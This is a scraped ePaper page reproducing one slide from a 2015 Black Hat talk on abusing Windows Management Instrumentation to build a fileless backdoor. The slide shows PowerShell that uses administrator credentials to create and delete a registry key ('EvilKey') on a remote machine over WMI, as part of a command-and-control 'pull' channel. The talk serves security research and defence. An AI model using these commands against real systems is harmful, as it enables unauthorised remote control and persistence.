Persistent Asynchronous and Fileless Backdoor
us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent Asynchronous-And-Fileless-Backdoor
us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent Asynchronous-And-Fileless-Backdoor
- No tags were found...
You also want an ePaper? Increase the reach of your titles
YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.
WMI Attacks – C2 Communication (Registry) – “Pull” AttackCreate a registry key remotely$Credential = Get-Credential 'WIN-B85AAA7ST4U\Administrator'$CommonArgs = @{Credential = $CredentialComputerName = '192.168.72.131'}$HKLM = 2147483650Invoke-WmiMethod @CommonArgs -Class StdRegProv -Name CreateKey -ArgumentList $HKLM,'SOFTWARE\EvilKey‘Invoke-WmiMethod @CommonArgs -Class StdRegProv -Name DeleteValue -ArgumentList $HKLM,'SOFTWARE\EvilKey', 'Result'